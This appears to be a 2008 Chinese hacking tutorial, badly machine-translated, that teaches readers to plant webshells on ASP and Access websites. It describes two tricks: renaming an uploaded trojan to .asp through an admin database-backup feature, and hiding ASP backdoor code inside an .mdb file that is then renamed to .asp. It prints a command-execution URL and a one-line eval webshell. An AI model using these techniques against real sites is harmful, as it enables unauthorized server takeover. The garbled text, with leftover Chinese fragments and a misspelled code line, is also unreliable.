Use Access database to get Webshell-vulnerability warning-the black bar safety net

2008-01-14T00:00:00
ID MYHACK58:62200818136
Type myhack58
Reporter 佚名
Modified 2008-01-14T00:00:00

Description

Hello everyone,I'm David,today the speaker of the content is:"use access database to get webshell"

---------------------------------------------------------------

In ASP+MSSQL case of injection directly to get a webshell is a very common thing,but in ASP+ACCESS the following is a non Be able to complete the task,because the ACCESS of the mentally retarded the SQL statement it is difficult for you to make a difference. However,the clever use of ACCESS program some of the features,we Also can the sound get a webshell.

---------------------------------------------------------------- Step one:use ACCESS database backup to get the shell

I used to by a conventional injection method of take to a download the background of the system password. But into the background after they found,the program does not let you upload. asp. asa. cdx. cer and other files,just allow the image and the RAR document upload,only allows image and the RAR document uploaded,it looks like programmers is still very pay attention to prevent ASP Trojan. Don't just give up? I'm in the background turn to pour to go,found a database backup function.

Use a SQL statement to backup the database? As if I didn't have this for ACCESS SQL statement. If I estimate correctly,it should be is Call the ASP's FSO function will be the current database file to COPY to another path. So I would Haiyang top nets ASP Trojan 2 0 0 4. ASP changed 2 0 0 4. gif upload to the Download System space,then do this set:

-------------------------------- 当前 数据库 路径 :database/2004.gif BACKUP DATABASE directory:databackup The Backup Database Name:2 0 0 4. asp --------------------------------

Mean 2 0 0 4. gif backup to another path,the file name becomes 2 0 0 4. asp. The point of"backup data"button,I successfully get a webshell. This should be available as a generic alternative to give the webshell method,in bbsxp forum I also successfully tested.

---------------------------------------------------------------- Step two:using the database of the anti-download feature to get webshell

To prevent the ACCESS database is downloaded,it is common practice in the database a table to add a OLE field,the field is written to a contains"<%" Binary data,and then the. the mdb suffix is changed to. asp it is possible to prevent the download of,of this practice in the Jules process is actually put in this. the mdb becomes. asp File,and the. asp files do not download. Think? If here we in the. mdb file in write an ASP Backdoor code,sure it will perform. Come on,one step at a time with me to do.

I online just find a article system article. mdb files. With ACCESS2003 open a nodown field,the data type is OLE object,according to the prompt to save the table name nodown table. Here I did not give nodown table setting the primary key.

And then double-click nodwon table,point ACCESS2003 the Insert menu, object option,in the pop-up dialog box, select the Create from File option. The key step,I save the following code become 1. asp then click on the"Browse"button to insert 1. asp.

Done,now we can already put this article. mdb is renamed to. asp when the ASP Trojan. Here I write this ASP code usage is:. asp? c=cmd command,such as*. asp? c=dir+C:\. 我们 来看 看 这个 arrticle.mdb 改名 为 lcx.asp 后 如何 运行 . 输入 http://127.0.0.1:3005/6k/lcx.asp?c=dir+d:\,in the browser got a big pile of garbage,pulling the IE drop-down bar,successfully saw the D:directory listing.

Maybe you think I write this ASP code is too schematic,the function is also simple,you can try ice Fox prodigal son to the ASP code. However, to be noted that,write the ASP code just write<script runat=server language=javascript>evel(request. form(’#")+’)</script>this sentence can be. Of course,my method also can not guarantee hundred percent success,but the success rate is very high. So the ASP code is inserted at the site of the ACCESS database,how ingenious terrible!